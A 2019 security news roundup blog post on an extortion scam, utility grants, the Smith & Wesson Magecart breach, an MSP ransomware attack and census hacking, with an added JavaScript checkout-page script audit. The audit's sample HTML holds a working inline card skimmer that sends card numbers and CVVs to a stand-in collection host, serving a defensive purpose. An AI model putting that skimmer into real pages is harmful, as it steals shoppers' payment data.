Security News for the Week Ending December 6, 2019
Caller Poses as CISA Rep in Extortion Scam
Homeland Security’s CISA (Cybersecurity and Infrastructure Security Agency) says that it is aware of a scam in which a caller pretends to be a CISA representative, claims to have evidence of the target’s questionable behavior, and then tries to extort a payment.
CISA says not to fall for it: do not pay, and report the call to the FBI. Source: Homeland Security.
Senate Committee Approves $250 Mil for Utility Security
The PROTECT program would provide grants for utilities to improve their security. Given that a government report with limited distribution says that the Russians (and not the Chinese) have already compromised a number of US utilities, improving security is probably a smart idea. The nice part is that it is a grant. The catch is that the money would be spread out over five years, so in reality we are talking about $50 million a year. It also seems to be focused on electric utilities and does not appear to cover water or other utilities. There are around 3,300 electric utilities alone in the US. If we ignore everything but electric and spread the money equally (which, of course, they won’t), each utility would get about $15,000. That will definitely get the job done. NOT! Source: Nextgov
Smith & Wesson’s Online Store Hacked by Magecart
Lawrence Abrams of Bleeping Computer fame tried to warn Smith & Wesson that their online store had been compromised by Magecart, the card-skimming scripts that criminals inject into checkout pages to copy card numbers as shoppers type them. They join the likes of British Airways (facing a proposed £183 million fine from the UK ICO over its own Magecart breach) and thousands of others. Abrams had not heard back from Smith & Wesson by publication time. Source: Bleeping Computer
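A Magecart infection is, at bottom, an extra script on the checkout page, either loaded from a domain the store never intended to use or pasted inline, that reads the card fields and ships them off to a collection server. A quick way for a store owner to catch that is to audit the page's script tags against an allowlist and to look for inline code that both touches payment fields and sends data somewhere. The following is an added example written for this post, not code from Smith & Wesson, Bleeping Computer, or any Magecart group; the checkout HTML, the allowed hosts (shop.example.com, cdn.example.com) and the look-alike skimmer domain are all constructed for illustration.

```javascript
// Added example: audit a checkout page's <script> tags for Magecart-style
// injections. Everything below is constructed for illustration; it is not
// taken from any real store or any real skimmer.

// Assumed allowlist of hosts the checkout page legitimately loads scripts from.
const ALLOWED_SCRIPT_HOSTS = new Set(["shop.example.com", "cdn.example.com"]);
const PAGE_BASE_URL = "https://shop.example.com/checkout"; // assumed page URL

// Constructed sample page: a legitimate script with Subresource Integrity,
// a legitimate script without it, an injected script from a look-alike
// domain, and an inline skimmer that hooks the payment form.
const SAMPLE_CHECKOUT_HTML = `
<html><body>
<form id="payment"><input name="cc_number"><input name="cvv"></form>
<script src="https://shop.example.com/js/checkout.js" integrity="sha384-abc"></script>
<script src="https://cdn.example.com/jquery.min.js"></script>
<script src="https://shop-example.com/js/analytics.js"></script>
<script>
document.getElementById("payment").addEventListener("submit", function () {
  var d = JSON.stringify({n: document.querySelector("[name=cc_number]").value,
                          c: document.querySelector("[name=cvv]").value});
  new Image().src = "https://stats-collector.example.net/i.gif?d=" + btoa(d);
});
</script>
</body></html>`;

// Pull every <script> tag out of the HTML. A regex is enough for this
// constructed sample; a real audit should walk the DOM (or a proper parser).
function extractScripts(html) {
  const scripts = [];
  const tagRe = /<script\b([^>]*)>([\s\S]*?)<\/script>/gi;
  let m;
  while ((m = tagRe.exec(html)) !== null) {
    const attrs = m[1];
    const srcMatch = /\bsrc\s*=\s*["']([^"']+)["']/i.exec(attrs);
    scripts.push({
      src: srcMatch ? srcMatch[1] : null,
      hasIntegrity: /\bintegrity\s*=/i.test(attrs),
      body: m[2].trim(),
    });
  }
  return scripts;
}

// Return a list of findings: external scripts from unexpected hosts, allowed
// scripts that lack an integrity attribute (so a tampered CDN copy would still
// load), and inline scripts that read card fields and send them anywhere.
function auditScripts(html, allowedHosts = ALLOWED_SCRIPT_HOSTS) {
  const findings = [];
  for (const s of extractScripts(html)) {
    if (s.src !== null) {
      const host = new URL(s.src, PAGE_BASE_URL).hostname;
      if (!allowedHosts.has(host)) {
        findings.push({ kind: "unexpected-host", detail: host });
      } else if (!s.hasIntegrity) {
        findings.push({ kind: "missing-sri", detail: s.src });
      }
    } else {
      // Heuristic: inline code that references payment inputs AND uses a
      // common exfiltration primitive (image beacon, fetch, XHR, sendBeacon).
      const touchesCard = /cc_number|cvv|card/i.test(s.body);
      const exfiltrates = /new Image\(\)|fetch\(|XMLHttpRequest|sendBeacon/i.test(s.body);
      if (touchesCard && exfiltrates) {
        findings.push({ kind: "inline-skimmer", detail: s.body.slice(0, 60) });
      }
    }
  }
  return findings;
}

// Usage: node audit.js prints one line per finding for the sample page.
for (const f of auditScripts(SAMPLE_CHECKOUT_HTML)) {
  console.log(`${f.kind}: ${f.detail}`);
}
```

On the sample page the audit flags the look-alike host shop-example.com, the jquery copy served without Subresource Integrity, and the inline handler that beacons the card number out. The inline heuristic is deliberately loose and will miss obfuscated skimmers; it is a first pass, not a substitute for a Content Security Policy that names the permitted script sources and reports violations.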
Another MSP Hit by Ransomware Attack
CyrusOne, one of the larger MSPs, was hit by a ransomware attack that affected some of its customers. As I said in my blog post earlier this week, attacks against MSPs are up because they are juicier targets: one compromise gives the attacker a path into many customers at once.
In CyrusOne’s case, they said the affected customers were primarily in a single data center in New York (which hopefully means their network is segmented), that colocation customers were not affected, only managed-services customers (in a colo, the provider does not hold credentials to the customer’s servers), and that they are investigating.
This is one more reminder that you can outsource the work to a service provider, but not the responsibility: the buck still stops with you when the provider is hacked. Source: MSSP Alert
Reuters Says Census Test Run in 2018 Was Attacked By Russia
Commerce outsourced the first digital census to Pegasystems, and at last check the cost has doubled to $167 million. More importantly, in a 2018 test, Russian hackers (not Chinese) were able to get past a firewall and reach systems they should not have been able to reach. The test was also hit with DNS attacks.
Sources say this raises concerns about whether T-Rex Solutions, the Commerce Department’s main security contractor, can keep the Russians out when the site actually goes live. Or the Chinese. Or other countries that would like to embarrass us.
Census said (a) no comment, (b) no data was stolen (this was likely reconnaissance by the Russians, so no surprise) and (c) the system worked as designed (i.e. the Russians got in and we panicked).
Clearly if the Russians are able to compromise the Census, that would be a HUGE black eye for this President and the Executive Branch.
They can hide things during a test, but cannot hide them when it goes live, so let’s hope they are able to fix it. Source: Reuters